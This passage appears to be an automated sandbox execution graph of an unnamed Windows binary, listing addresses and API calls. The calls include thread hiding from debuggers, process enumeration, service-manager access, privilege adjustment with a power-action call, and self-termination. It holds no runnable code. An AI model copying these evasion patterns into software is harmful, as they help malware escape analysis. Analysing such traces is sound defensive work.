                              execution_graph 78911 6c854a27 78912 6c854a5d _strlen 78911->78912 78913 6c86639e 78912->78913 78914 6c855b6f 78912->78914 78915 6c855b58 78912->78915 78919 6c855b09 _Yarn 78912->78919 79043 6c9d06a0 18 API calls 2 library calls 78913->79043 78917 6c9c6fb3 std::_Facet_Register 4 API calls 78914->78917 79029 6c9c6fb3 78915->79029 78917->78919 79002 6c9bb430 78919->79002 78922 6c855bad std::ios_base::_Ios_base_dtor 78922->78913 78925 6c859ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 78922->78925 79008 6c9c5560 CreateProcessA 78922->79008 78923 6c9c6fb3 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 78923->78925 78924 6c9bb430 2 API calls 78924->78925 78925->78913 78925->78923 78925->78924 78926 6c85a292 Sleep 78925->78926 78945 6c85e619 78925->78945 78944 6c859bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 78926->78944 78927 6c856624 78930 6c9c6fb3 std::_Facet_Register 4 API calls 78927->78930 78928 6c85660d 78929 6c9c6fb3 std::_Facet_Register 4 API calls 78928->78929 78936 6c8565bc _Yarn _strlen 78929->78936 78930->78936 78931 6c8561cb _strlen 78931->78913 78931->78927 78931->78928 78931->78936 78932 6c9c5560 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 78932->78944 78933 6c859bbd GetCurrentProcess TerminateProcess 78933->78925 78934 6c8663b2 79044 6c8415e0 18 API calls std::ios_base::_Ios_base_dtor 78934->79044 78936->78934 78938 6c856970 78936->78938 78939 6c856989 78936->78939 78942 6c856920 _Yarn 78936->78942 78937 6c8664f8 78940 6c9c6fb3 std::_Facet_Register 4 API calls 78938->78940 78941 6c9c6fb3 std::_Facet_Register 4 API calls 78939->78941 78940->78942 78941->78942 79012 6c9c5ed0 78942->79012 78944->78913 78944->78925 78944->78932 78944->78933 78944->78934 78986 6c9c6fb3 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 78944->78986 78992 6c9c5ed0 104 API calls 78944->78992 78947 6c85f243 CreateFileA 78945->78947 78946 6c8569d6 std::ios_base::_Ios_base_dtor _strlen 78946->78913 78948 6c856dd2 78946->78948 78949 6c856dbb 78946->78949 78961 6c856d69 _Yarn _strlen 78946->78961 78960 6c85f2a7 78947->78960 78950 6c9c6fb3 std::_Facet_Register 4 API calls 78948->78950 78952 6c9c6fb3 std::_Facet_Register 4 API calls 78949->78952 78950->78961 78951 6c8602ca 78952->78961 78953 6c857427 78955 6c9c6fb3 std::_Facet_Register 4 API calls 78953->78955 78954 6c857440 78956 6c9c6fb3 std::_Facet_Register 4 API calls 78954->78956 78957 6c8573da _Yarn 78955->78957 78956->78957 78959 6c9c5ed0 104 API calls 78957->78959 78958 6c8602ac GetCurrentProcess TerminateProcess 78958->78951 78962 6c85748d std::ios_base::_Ios_base_dtor _strlen 78959->78962 78960->78951 78960->78958 78961->78934 78961->78953 78961->78954 78961->78957 78962->78913 78963 6c857991 78962->78963 78964 6c8579a8 78962->78964 78967 6c857940 _Yarn _strlen 78962->78967 78965 6c9c6fb3 std::_Facet_Register 4 API calls 78963->78965 78966 6c9c6fb3 std::_Facet_Register 4 API calls 78964->78966 78965->78967 78966->78967 78967->78934 78968 6c857de2 78967->78968 78969 6c857dc9 78967->78969 78972 6c857d7c _Yarn 78967->78972 78971 6c9c6fb3 std::_Facet_Register 4 API calls 78968->78971 78970 6c9c6fb3 std::_Facet_Register 4 API calls 78969->78970 78970->78972 78971->78972 78973 6c9c5ed0 104 API calls 78972->78973 78974 6c857e2f std::ios_base::_Ios_base_dtor _strlen 78973->78974 78974->78913 78975 6c8585bf 78974->78975 78976 6c8585a8 78974->78976 78983 6c858556 _Yarn _strlen 78974->78983 78978 6c9c6fb3 std::_Facet_Register 4 API calls 78975->78978 78977 6c9c6fb3 std::_Facet_Register 4 API calls 78976->78977 78977->78983 78978->78983 78979 6c858983 78982 6c9c6fb3 std::_Facet_Register 4 API calls 78979->78982 78980 6c85896a 78981 6c9c6fb3 std::_Facet_Register 4 API calls 78980->78981 78984 6c85891d _Yarn 78981->78984 78982->78984 78983->78934 78983->78979 78983->78980 78983->78984 78985 6c9c5ed0 104 API calls 78984->78985 78989 6c8589d0 std::ios_base::_Ios_base_dtor _strlen 78985->78989 78986->78944 78987 6c858f36 78991 6c9c6fb3 std::_Facet_Register 4 API calls 78987->78991 78988 6c858f1f 78990 6c9c6fb3 std::_Facet_Register 4 API calls 78988->78990 78989->78913 78989->78987 78989->78988 78995 6c858ecd _Yarn _strlen 78989->78995 78990->78995 78991->78995 78992->78944 78993 6c859354 78996 6c9c6fb3 std::_Facet_Register 4 API calls 78993->78996 78994 6c85936d 78997 6c9c6fb3 std::_Facet_Register 4 API calls 78994->78997 78995->78934 78995->78993 78995->78994 78998 6c859307 _Yarn 78995->78998 78996->78998 78997->78998 78999 6c9c5ed0 104 API calls 78998->78999 79001 6c8593ba std::ios_base::_Ios_base_dtor 78999->79001 79000 6c9c5560 4 API calls 79000->78925 79001->78913 79001->79000 79003 6c9bb446 FindFirstFileA 79002->79003 79004 6c9bb444 79002->79004 79006 6c9bb480 79003->79006 79004->79003 79005 6c9bb484 FindClose 79005->79006 79006->79005 79007 6c9bb4e2 79006->79007 79007->78922 79009 6c9c563a 79008->79009 79010 6c9c55f0 WaitForSingleObject CloseHandle CloseHandle 79009->79010 79011 6c9c5653 79009->79011 79010->79009 79011->78931 79013 6c9c5f27 79012->79013 79045 6c9c6560 79013->79045 79015 6c9c5f38 79064 6c866ba0 79015->79064 79017 6c9c5fd7 79116 6c88e010 79017->79116 79019 6c9c600f std::ios_base::_Ios_base_dtor 79021 6c88e010 67 API calls 79019->79021 79024 6c9c6052 std::ios_base::_Ios_base_dtor 79021->79024 79022 6c9c5f5c 79022->79017 79023 6c9c5fc4 79022->79023 79083 6c9c68b0 79022->79083 79091 6c8a2370 79022->79091 79101 6c9c6100 79023->79101 79024->78946 79027 6c9c5fcc 79122 6c867090 79027->79122 79030 6c9c6fb8 79029->79030 79031 6c9c6fd2 79030->79031 79034 6c9c6fd4 std::_Facet_Register 79030->79034 79581 6c9cf584 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 79030->79581 79031->78919 79033 6c9c7e33 std::_Facet_Register 79585 6c9c98e9 RaiseException 79033->79585 79034->79033 79582 6c9c98e9 RaiseException 79034->79582 79036 6c9c862c IsProcessorFeaturePresent 79042 6c9c8651 79036->79042 79038 6c9c7df3 79583 6c9c98e9 RaiseException 79038->79583 79040 6c9c7e13 std::invalid_argument::invalid_argument 79584 6c9c98e9 RaiseException 79040->79584 79042->78919 79044->78937 79046 6c9c6595 79045->79046 79135 6c892020 79046->79135 79048 6c9c6636 79049 6c9c6fb3 std::_Facet_Register 4 API calls 79048->79049 79050 6c9c666e 79049->79050 79152 6c9c7897 79050->79152 79052 6c9c6682 79164 6c891d90 79052->79164 79055 6c9c675c 79055->79015 79057 6c9c6796 79172 6c8926e0 24 API calls 4 library calls 79057->79172 79059 6c9c67a8 79173 6c9c98e9 RaiseException 79059->79173 79061 6c9c67bd 79062 6c88e010 67 API calls 79061->79062 79063 6c9c67cf 79062->79063 79063->79015 79065 6c866bd5 79064->79065 79066 6c892020 52 API calls 79065->79066 79067 6c866c68 79066->79067 79068 6c9c6fb3 std::_Facet_Register 4 API calls 79067->79068 79069 6c866ca0 79068->79069 79070 6c9c7897 43 API calls 79069->79070 79071 6c866cb4 79070->79071 79072 6c891d90 89 API calls 79071->79072 79073 6c866d5d 79072->79073 79074 6c866d8e 79073->79074 79483 6c892250 30 API calls 79073->79483 79074->79022 79076 6c866dc8 79484 6c8926e0 24 API calls 4 library calls 79076->79484 79078 6c866dda 79485 6c9c98e9 RaiseException 79078->79485 79080 6c866def 79081 6c88e010 67 API calls 79080->79081 79082 6c866e0f 79081->79082 79082->79022 79084 6c9c68fd 79083->79084 79486 6c9c6b10 79084->79486 79086 6c9c6915 79089 6c9c69ec 79086->79089 79504 6c892250 30 API calls 79086->79504 79505 6c8926e0 24 API calls 4 library calls 79086->79505 79506 6c9c98e9 RaiseException 79086->79506 79089->79022 79094 6c8a23af 79091->79094 79092 6c8a23c3 79093 6c8a247e 79092->79093 79517 6c892250 30 API calls 79092->79517 79518 6c8926e0 24 API calls 4 library calls 79092->79518 79519 6c9c98e9 RaiseException 79092->79519 79098 6c8a2491 79093->79098 79516 6c8937e0 32 API calls std::_Xinvalid_argument 79093->79516 79094->79092 79515 6c893560 32 API calls std::_Xinvalid_argument 79094->79515 79098->79022 79102 6c9c610e 79101->79102 79105 6c9c6141 79101->79105 79520 6c8901f0 79102->79520 79103 6c9c61f3 79103->79027 79105->79103 79524 6c892250 30 API calls 79105->79524 79108 6c9d1088 67 API calls 79108->79105 79109 6c9c621e 79525 6c892340 24 API calls 79109->79525 79111 6c9c622e 79526 6c9c98e9 RaiseException 79111->79526 79113 6c9c6239 79114 6c88e010 67 API calls 79113->79114 79115 6c9c6292 std::ios_base::_Ios_base_dtor 79114->79115 79115->79027 79117 6c88e04b 79116->79117 79118 6c8901f0 64 API calls 79117->79118 79119 6c88e0a3 79117->79119 79120 6c88e098 79118->79120 79119->79019 79121 6c9d1088 67 API calls 79120->79121 79121->79119 79123 6c86709e 79122->79123 79127 6c8670d1 79122->79127 79124 6c8901f0 64 API calls 79123->79124 79126 6c8670c4 79124->79126 79125 6c867183 79125->79017 79128 6c9d1088 67 API calls 79126->79128 79127->79125 79578 6c892250 30 API calls 79127->79578 79128->79127 79130 6c8671ae 79579 6c892340 24 API calls 79130->79579 79132 6c8671be 79580 6c9c98e9 RaiseException 79132->79580 79134 6c8671c9 79136 6c9c6fb3 std::_Facet_Register 4 API calls 79135->79136 79137 6c89207e 79136->79137 79138 6c9c7897 43 API calls 79137->79138 79139 6c892092 79138->79139 79174 6c892f60 42 API calls 4 library calls 79139->79174 79141 6c8920c8 79142 6c89210d 79141->79142 79143 6c892136 79141->79143 79144 6c892120 79142->79144 79175 6c9c74fe 9 API calls 2 library calls 79142->79175 79176 6c892250 30 API calls 79143->79176 79144->79048 79147 6c89215b 79177 6c892340 24 API calls 79147->79177 79149 6c892171 79178 6c9c98e9 RaiseException 79149->79178 79151 6c89217c 79151->79048 79153 6c9c78a3 __EH_prolog3 79152->79153 79179 6c9c7425 79153->79179 79158 6c9c78c1 79193 6c9c792a 39 API calls std::locale::_Setgloballocale 79158->79193 79159 6c9c791c 79159->79052 79161 6c9c78c9 79194 6c9c7721 HeapFree GetLastError _Yarn 79161->79194 79163 6c9c78df 79185 6c9c7456 79163->79185 79165 6c891ddc 79164->79165 79166 6c891dc7 79164->79166 79199 6c9c79b7 79165->79199 79166->79055 79171 6c892250 30 API calls 79166->79171 79170 6c891e82 79171->79057 79172->79059 79173->79061 79174->79141 79175->79144 79176->79147 79177->79149 79178->79151 79180 6c9c743b 79179->79180 79181 6c9c7434 79179->79181 79182 6c9c7439 79180->79182 79196 6c9c8afb EnterCriticalSection 79180->79196 79195 6c9d093d 6 API calls std::_Lockit::_Lockit 79181->79195 79182->79163 79192 6c9c77a0 6 API calls 2 library calls 79182->79192 79186 6c9d094b 79185->79186 79187 6c9c7460 79185->79187 79198 6c9d0926 LeaveCriticalSection 79186->79198 79191 6c9c7473 79187->79191 79197 6c9c8b09 LeaveCriticalSection 79187->79197 79190 6c9d0952 79190->79159 79191->79159 79192->79158 79193->79161 79194->79163 79195->79182 79196->79182 79197->79191 79198->79190 79200 6c9c79c0 79199->79200 79201 6c891dea 79200->79201 79208 6c9d02ba 79200->79208 79201->79166 79207 6c9ccad3 18 API calls __fassign 79201->79207 79203 6c9c7a0c 79203->79201 79219 6c9cffc8 65 API calls 79203->79219 79205 6c9c7a27 79205->79201 79220 6c9d1088 79205->79220 79207->79170 79209 6c9d02c5 __wsopen_s 79208->79209 79210 6c9d02d8 79209->79210 79212 6c9d02f8 79209->79212 79245 6c9d0690 18 API calls __fassign 79210->79245 79215 6c9d02e8 79212->79215 79231 6c9db37c 79212->79231 79215->79203 79219->79205 79221 6c9d1094 __wsopen_s 79220->79221 79222 6c9d109e 79221->79222 79223 6c9d10b3 79221->79223 79369 6c9d0690 18 API calls __fassign 79222->79369 79230 6c9d10ae 79223->79230 79354 6c9ccb19 EnterCriticalSection 79223->79354 79226 6c9d10d0 79355 6c9d110c 79226->79355 79228 6c9d10db 79370 6c9d1102 LeaveCriticalSection 79228->79370 79230->79201 79232 6c9db388 __wsopen_s 79231->79232 79247 6c9d090f EnterCriticalSection 79232->79247 79234 6c9db396 79248 6c9db420 79234->79248 79239 6c9db4e2 79240 6c9db601 79239->79240 79272 6c9db684 79240->79272 79243 6c9d033c 79246 6c9d0365 LeaveCriticalSection 79243->79246 79245->79215 79246->79215 79247->79234 79251 6c9db443 79248->79251 79249 6c9db49b 79267 6c9d7755 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 79249->79267 79251->79249 79257 6c9db3a3 79251->79257 79265 6c9ccb19 EnterCriticalSection 79251->79265 79266 6c9ccb2d LeaveCriticalSection 79251->79266 79252 6c9db4a4 79268 6c9d4d2b HeapFree GetLastError _free 79252->79268 79255 6c9db4ad 79255->79257 79269 6c9d718f 6 API calls std::_Lockit::_Lockit 79255->79269 79262 6c9db3dc 79257->79262 79258 6c9db4cc 79270 6c9ccb19 EnterCriticalSection 79258->79270 79261 6c9db4df 79261->79257 79271 6c9d0926 LeaveCriticalSection 79262->79271 79264 6c9d0313 79264->79215 79264->79239 79265->79251 79266->79251 79267->79252 79268->79255 79269->79258 79270->79261 79271->79264 79273 6c9db6a3 79272->79273 79274 6c9db6b6 79273->79274 79278 6c9db6cb 79273->79278 79288 6c9d0690 18 API calls __fassign 79274->79288 79276 6c9db617 79276->79243 79285 6c9e454e 79276->79285 79283 6c9db7eb 79278->79283 79289 6c9e4418 37 API calls __fassign 79278->79289 79280 6c9db83b 79280->79283 79290 6c9e4418 37 API calls __fassign 79280->79290 79282 6c9db859 79282->79283 79291 6c9e4418 37 API calls __fassign 79282->79291 79283->79276 79292 6c9d0690 18 API calls __fassign 79283->79292 79293 6c9e4906 79285->79293 79288->79276 79289->79280 79290->79282 79291->79283 79292->79276 79295 6c9e4912 __wsopen_s 79293->79295 79294 6c9e4919 79311 6c9d0690 18 API calls __fassign 79294->79311 79295->79294 79296 6c9e4944 79295->79296 79302 6c9e456e 79296->79302 79301 6c9e4569 79301->79243 79313 6c9d0c3b 79302->79313 79308 6c9e45a4 79310 6c9e45d6 79308->79310 79353 6c9d4d2b HeapFree GetLastError _free 79308->79353 79312 6c9e499b LeaveCriticalSection __wsopen_s 79310->79312 79311->79301 79312->79301 79314 6c9cc25b __fassign 37 API calls 79313->79314 79315 6c9d0c4d 79314->79315 79316 6c9d0c5f 79315->79316 79317 6c9d6f45 __wsopen_s 5 API calls 79315->79317 79318 6c9cc366 79316->79318 79317->79316 79319 6c9cc3be __wsopen_s GetLastError HeapFree GetLastError MultiByteToWideChar 79318->79319 79320 6c9cc37e 79319->79320 79320->79308 79321 6c9e45dc 79320->79321 79322 6c9e4a5c __wsopen_s 18 API calls 79321->79322 79323 6c9e45f9 79322->79323 79324 6c9e460e __dosmaperr 79323->79324 79325 6c9e1b7c __wsopen_s 14 API calls 79323->79325 79324->79308 79326 6c9e462c 79325->79326 79326->79324 79327 6c9e49c7 __wsopen_s CreateFileW 79326->79327 79332 6c9e4685 79327->79332 79328 6c9e4702 GetFileType 79329 6c9e470d GetLastError 79328->79329 79330 6c9e4754 79328->79330 79333 6c9cff62 __dosmaperr 79329->79333 79336 6c9e1d20 __wsopen_s SetStdHandle 79330->79336 79331 6c9e46d7 GetLastError 79331->79324 79332->79328 79332->79331 79335 6c9e49c7 __wsopen_s CreateFileW 79332->79335 79334 6c9e471b CloseHandle 79333->79334 79334->79324 79349 6c9e4744 79334->79349 79337 6c9e46ca 79335->79337 79338 6c9e4775 79336->79338 79337->79328 79337->79331 79339 6c9e47c1 79338->79339 79340 6c9e4bd6 __wsopen_s 70 API calls 79338->79340 79341 6c9e4c80 __wsopen_s 70 API calls 79339->79341 79343 6c9e47c8 79339->79343 79340->79339 79342 6c9e47f6 79341->79342 79342->79343 79344 6c9e4804 79342->79344 79345 6c9dbe95 __wsopen_s 21 API calls 79343->79345 79344->79324 79346 6c9e4880 CloseHandle 79344->79346 79345->79324 79347 6c9e49c7 __wsopen_s CreateFileW 79346->79347 79348 6c9e48ab 79347->79348 79348->79349 79350 6c9e48b5 GetLastError 79348->79350 79349->79324 79351 6c9e48c1 __dosmaperr 79350->79351 79352 6c9e1c8f __wsopen_s SetStdHandle 79351->79352 79352->79349 79353->79310 79354->79226 79356 6c9d112e 79355->79356 79357 6c9d1119 79355->79357 79360 6c9d1129 79356->79360 79371 6c9d1229 79356->79371 79393 6c9d0690 18 API calls __fassign 79357->79393 79360->79228 79365 6c9d1151 79386 6c9dbe08 79365->79386 79367 6c9d1157 79367->79360 79394 6c9d4d2b HeapFree GetLastError _free 79367->79394 79369->79230 79370->79230 79372 6c9d1241 79371->79372 79376 6c9d1143 79371->79376 79373 6c9da1d0 18 API calls 79372->79373 79372->79376 79374 6c9d125f 79373->79374 79395 6c9dc0dc 79374->79395 79377 6c9d8cae 79376->79377 79378 6c9d114b 79377->79378 79379 6c9d8cc5 79377->79379 79381 6c9da1d0 79378->79381 79379->79378 79451 6c9d4d2b HeapFree GetLastError _free 79379->79451 79382 6c9da1dc 79381->79382 79383 6c9da1f1 79381->79383 79452 6c9d0690 18 API calls __fassign 79382->79452 79383->79365 79385 6c9da1ec 79385->79365 79387 6c9dbe2e 79386->79387 79388 6c9dbe19 __dosmaperr 79386->79388 79389 6c9dbe55 79387->79389 79390 6c9dbe77 __dosmaperr 79387->79390 79388->79367 79453 6c9dbf31 79389->79453 79461 6c9d0690 18 API calls __fassign 79390->79461 79393->79360 79394->79360 79397 6c9dc0e8 __wsopen_s 79395->79397 79396 6c9dc0f0 __dosmaperr 79396->79376 79397->79396 79398 6c9dc13a 79397->79398 79399 6c9dc1a3 __dosmaperr 79397->79399 79406 6c9e1f00 EnterCriticalSection 79398->79406 79436 6c9d0690 18 API calls __fassign 79399->79436 79401 6c9dc140 79404 6c9dc15c __dosmaperr 79401->79404 79407 6c9dc1ce 79401->79407 79435 6c9dc19b LeaveCriticalSection __wsopen_s 79404->79435 79406->79401 79408 6c9dc1f0 79407->79408 79434 6c9dc20c __dosmaperr 79407->79434 79409 6c9dc244 79408->79409 79411 6c9dc1f4 __dosmaperr 79408->79411 79410 6c9dc257 79409->79410 79445 6c9db1d9 20 API calls __wsopen_s 79409->79445 79437 6c9dc3b0 79410->79437 79444 6c9d0690 18 API calls __fassign 79411->79444 79416 6c9dc26d 79420 6c9dc296 79416->79420 79421 6c9dc271 79416->79421 79417 6c9dc2ac 79418 6c9dc305 WriteFile 79417->79418 79419 6c9dc2c0 79417->79419 79422 6c9dc329 GetLastError 79418->79422 79418->79434 79424 6c9dc2cb 79419->79424 79425 6c9dc2f5 79419->79425 79447 6c9dc421 43 API calls 5 library calls 79420->79447 79421->79434 79446 6c9dc7cb 6 API calls __wsopen_s 79421->79446 79422->79434 79426 6c9dc2e5 79424->79426 79427 6c9dc2d0 79424->79427 79450 6c9dc833 7 API calls 2 library calls 79425->79450 79449 6c9dc9f7 8 API calls 3 library calls 79426->79449 79430 6c9dc2d5 79427->79430 79427->79434 79448 6c9dc90e 7 API calls 2 library calls 79430->79448 79432 6c9dc2e3 79432->79434 79434->79404 79435->79396 79436->79396 79438 6c9e1f55 __wsopen_s 18 API calls 79437->79438 79439 6c9dc3c1 79438->79439 79440 6c9dc268 79439->79440 79441 6c9d4f22 __Getctype 37 API calls 79439->79441 79440->79416 79440->79417 79442 6c9dc3e4 79441->79442 79442->79440 79443 6c9dc3fe GetConsoleMode 79442->79443 79443->79440 79444->79434 79445->79410 79446->79434 79447->79434 79448->79432 79449->79432 79450->79432 79451->79378 79452->79385 79454 6c9dbf3d __wsopen_s 79453->79454 79462 6c9e1f00 EnterCriticalSection 79454->79462 79456 6c9dbf4b 79458 6c9dbf78 79456->79458 79463 6c9dbe95 79456->79463 79476 6c9dbfb1 LeaveCriticalSection __wsopen_s 79458->79476 79460 6c9dbf9a 79460->79388 79461->79388 79462->79456 79477 6c9e1b12 79463->79477 79465 6c9dbeab 79482 6c9e1c8f SetStdHandle __dosmaperr __wsopen_s 79465->79482 79466 6c9dbea5 79466->79465 79468 6c9dbedd 79466->79468 79470 6c9e1b12 __wsopen_s 18 API calls 79466->79470 79468->79465 79469 6c9e1b12 __wsopen_s 18 API calls 79468->79469 79471 6c9dbee9 CloseHandle 79469->79471 79472 6c9dbed4 79470->79472 79471->79465 79474 6c9dbef5 GetLastError 79471->79474 79473 6c9e1b12 __wsopen_s 18 API calls 79472->79473 79473->79468 79474->79465 79475 6c9dbf03 __dosmaperr 79475->79458 79476->79460 79478 6c9e1b1f __dosmaperr 79477->79478 79480 6c9e1b34 __dosmaperr 79477->79480 79478->79466 79479 6c9e1b59 79479->79466 79480->79479 79481 6c9d0690 __fassign 18 API calls 79480->79481 79481->79478 79482->79475 79483->79076 79484->79078 79485->79080 79487 6c9c6b4c 79486->79487 79488 6c9c6b78 79486->79488 79489 6c9c6b71 79487->79489 79509 6c892250 30 API calls 79487->79509 79494 6c9c6b89 79488->79494 79507 6c893560 32 API calls std::_Xinvalid_argument 79488->79507 79489->79086 79492 6c9c6d58 79510 6c892340 24 API calls 79492->79510 79494->79489 79508 6c892f60 42 API calls 4 library calls 79494->79508 79495 6c9c6d67 79511 6c9c98e9 RaiseException 79495->79511 79498 6c9c6bc3 79498->79489 79512 6c892250 30 API calls 79498->79512 79500 6c9c6d97 79513 6c892340 24 API calls 79500->79513 79502 6c9c6dad 79514 6c9c98e9 RaiseException 79502->79514 79504->79086 79505->79086 79506->79086 79507->79494 79508->79498 79509->79492 79510->79495 79511->79498 79512->79500 79513->79502 79514->79489 79515->79092 79516->79098 79517->79092 79518->79092 79519->79092 79521 6c89022e 79520->79521 79522 6c8904d6 79521->79522 79527 6c9d1d4b 79521->79527 79522->79108 79524->79109 79525->79111 79526->79113 79528 6c9d1d59 79527->79528 79529 6c9d1d76 79527->79529 79528->79529 79530 6c9d1d7a 79528->79530 79531 6c9d1d66 79528->79531 79529->79521 79535 6c9d1f72 79530->79535 79543 6c9d0690 18 API calls __fassign 79531->79543 79536 6c9d1f7e __wsopen_s 79535->79536 79544 6c9ccb19 EnterCriticalSection 79536->79544 79538 6c9d1f8c 79545 6c9d1f2f 79538->79545 79542 6c9d1dac 79542->79521 79543->79529 79544->79538 79553 6c9d8b16 79545->79553 79551 6c9d1f69 79552 6c9d1fc1 LeaveCriticalSection 79551->79552 79552->79542 79554 6c9da1d0 18 API calls 79553->79554 79555 6c9d8b27 79554->79555 79570 6c9e1f55 79555->79570 79557 6c9d8b2d __wsopen_s 79558 6c9d1f43 79557->79558 79575 6c9d4d2b HeapFree GetLastError _free 79557->79575 79560 6c9d1dae 79558->79560 79562 6c9d1dc0 79560->79562 79564 6c9d1dde 79560->79564 79561 6c9d1dce 79577 6c9d0690 18 API calls __fassign 79561->79577 79562->79561 79562->79564 79567 6c9d1df6 _Yarn 79562->79567 79569 6c9d8bc9 62 API calls 79564->79569 79565 6c9d1229 62 API calls 79565->79567 79566 6c9da1d0 18 API calls 79566->79567 79567->79564 79567->79565 79567->79566 79568 6c9dc0dc __wsopen_s 62 API calls 79567->79568 79568->79567 79569->79551 79571 6c9e1f62 79570->79571 79573 6c9e1f6f 79570->79573 79571->79557 79572 6c9e1f7b 79572->79557 79573->79572 79576 6c9d0690 18 API calls __fassign 79573->79576 79575->79558 79576->79571 79577->79564 79578->79130 79579->79132 79580->79134 79581->79030 79582->79038 79583->79040 79584->79033 79585->79036 79586 6c9cf4af 79587 6c9cf4bb __wsopen_s 79586->79587 79588 6c9cf4cf 79587->79588 79589 6c9cf4c2 GetLastError ExitThread 79587->79589 79598 6c9d4f22 GetLastError 79588->79598 79594 6c9cf4eb 79631 6c9cf41a 16 API calls 2 library calls 79594->79631 79597 6c9cf50d 79599 6c9d4f39 79598->79599 79600 6c9d4f3f 79598->79600 79632 6c9d7093 6 API calls std::_Lockit::_Lockit 79599->79632 79604 6c9d4f45 SetLastError 79600->79604 79633 6c9d70d2 6 API calls std::_Lockit::_Lockit 79600->79633 79603 6c9d4f5d 79603->79604 79605 6c9d4f61 79603->79605 79609 6c9d4fd9 79604->79609 79610 6c9cf4d4 79604->79610 79634 6c9d7755 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 79605->79634 79608 6c9d4f6d 79611 6c9d4f8c 79608->79611 79612 6c9d4f75 79608->79612 79640 6c9d1039 37 API calls std::locale::_Setgloballocale 79609->79640 79625 6c9da2d6 79610->79625 79637 6c9d70d2 6 API calls std::_Lockit::_Lockit 79611->79637 79635 6c9d70d2 6 API calls std::_Lockit::_Lockit 79612->79635 79617 6c9d4f98 79619 6c9d4fad 79617->79619 79620 6c9d4f9c 79617->79620 79618 6c9d4f83 79636 6c9d4d2b HeapFree GetLastError _free 79618->79636 79639 6c9d4d2b HeapFree GetLastError _free 79619->79639 79638 6c9d70d2 6 API calls std::_Lockit::_Lockit 79620->79638 79623 6c9d4f89 79623->79604 79626 6c9da2e8 GetPEB 79625->79626 79627 6c9cf4df 79625->79627 79626->79627 79628 6c9da2fb 79626->79628 79627->79594 79630 6c9d72df 5 API calls std::_Lockit::_Lockit 79627->79630 79641 6c9d7388 5 API calls std::_Lockit::_Lockit 79628->79641 79630->79594 79631->79597 79632->79600 79633->79603 79634->79608 79635->79618 79636->79623 79637->79617 79638->79618 79639->79623 79641->79627 79642 6c843d62 79644 6c843bc0 79642->79644 79643 6c843e8a GetCurrentThread NtSetInformationThread 79645 6c843eea 79643->79645 79644->79643 79646 6c844b53 79647 6c9c6fb3 std::_Facet_Register 4 API calls 79646->79647 79648 6c844b5c _Yarn 79647->79648 79649 6c9bb430 2 API calls 79648->79649 79654 6c844bae std::ios_base::_Ios_base_dtor 79649->79654 79650 6c86639e 79837 6c9d06a0 18 API calls 2 library calls 79650->79837 79652 6c845164 CreateFileA CloseHandle 79658 6c8451ec 79652->79658 79653 6c844cff 79654->79650 79654->79652 79654->79653 79655 6c85245a _Yarn _strlen 79654->79655 79655->79650 79656 6c9bb430 2 API calls 79655->79656 79671 6c852a83 std::ios_base::_Ios_base_dtor 79656->79671 79804 6c9c5690 OpenSCManagerA 79658->79804 79660 6c84fc00 79830 6c9c57b0 CreateToolhelp32Snapshot 79660->79830 79663 6c9c6fb3 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 79698 6c845478 std::ios_base::_Ios_base_dtor _Yarn _strlen 79663->79698 79665 6c8537d0 Sleep 79710 6c8537e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 79665->79710 79666 6c9bb430 2 API calls 79666->79698 79667 6c8663b2 79838 6c8415e0 18 API calls std::ios_base::_Ios_base_dtor 79667->79838 79668 6c9c57b0 4 API calls 79686 6c85053a 79668->79686 79669 6c9c57b0 4 API calls 79691 6c8512e2 79669->79691 79671->79650 79808 6c9b0900 79671->79808 79672 6c84ffe3 79672->79668 79677 6c850abc 79672->79677 79673 6c8664f8 79674 6c866ba0 104 API calls 79674->79698 79675 6c866e60 32 API calls 79675->79698 79677->79655 79677->79669 79678 6c867090 77 API calls 79678->79698 79679 6c9c57b0 4 API calls 79679->79677 79680 6c846722 79827 6c9c1df0 25 API calls 4 library calls 79680->79827 79681 6c9c57b0 4 API calls 79700 6c851dd9 79681->79700 79682 6c85211c 79682->79655 79685 6c85241a 79682->79685 79683 6c9bb430 2 API calls 79683->79710 79684 6c88e010 67 API calls 79684->79698 79687 6c9b0900 11 API calls 79685->79687 79686->79677 79686->79679 79688 6c85244d 79687->79688 79836 6c9c62d0 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 79688->79836 79690 6c852452 Sleep 79690->79655 79691->79681 79691->79682 79703 6c8516ac 79691->79703 79692 6c846162 79693 6c84740b 79694 6c9c5560 4 API calls 79693->79694 79702 6c84775a _strlen 79694->79702 79695 6c9c57b0 4 API calls 79695->79682 79696 6c866ba0 104 API calls 79696->79710 79698->79650 79698->79660 79698->79663 79698->79666 79698->79674 79698->79675 79698->79678 79698->79680 79698->79684 79698->79692 79699 6c867090 77 API calls 79699->79710 79700->79682 79700->79695 79701 6c88e010 67 API calls 79701->79710 79702->79650 79704 6c847b92 79702->79704 79705 6c847ba9 79702->79705 79708 6c847b43 _Yarn 79702->79708 79707 6c9c6fb3 std::_Facet_Register 4 API calls 79704->79707 79706 6c9c6fb3 std::_Facet_Register 4 API calls 79705->79706 79706->79708 79707->79708 79709 6c9bb430 2 API calls 79708->79709 79717 6c847be7 std::ios_base::_Ios_base_dtor 79709->79717 79710->79650 79710->79683 79710->79696 79710->79699 79710->79701 79817 6c866e60 79710->79817 79711 6c9c5560 4 API calls 79722 6c848a07 79711->79722 79712 6c849d7f 79715 6c9c6fb3 std::_Facet_Register 4 API calls 79712->79715 79713 6c849d68 79714 6c9c6fb3 std::_Facet_Register 4 API calls 79713->79714 79716 6c849d18 _Yarn 79714->79716 79715->79716 79718 6c9bb430 2 API calls 79716->79718 79717->79650 79717->79711 79719 6c84962c _strlen 79717->79719 79720 6c848387 79717->79720 79727 6c849dbd std::ios_base::_Ios_base_dtor 79718->79727 79719->79650 79719->79712 79719->79713 79719->79716 79721 6c9c5560 4 API calls 79733 6c849120 79721->79733 79722->79721 79723 6c9c5560 4 API calls 79740 6c84a215 _strlen 